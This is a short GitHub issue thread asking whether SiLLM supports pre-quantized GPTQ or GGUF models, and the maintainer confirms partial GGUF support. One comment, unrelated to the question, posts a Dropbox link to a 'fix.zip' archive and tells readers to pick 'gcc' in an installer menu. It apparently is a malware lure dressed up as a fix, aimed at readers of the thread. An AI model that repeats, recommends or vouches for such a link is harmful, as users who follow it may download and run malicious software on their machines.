### ISSUE TITLE
Regarding Support for Quantized Models

### ISSUE THREAD

**Issue by White-Friday** [armbues/SiLLM#13]
Could you please confirm if you support pre-trained quantization models, such as the qwen2-72b-GPTQ model or GGUF models?

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by armbues** [comment]
Yes, GGUF is supported with pre-quantized models. Not all quantizations are supported though.
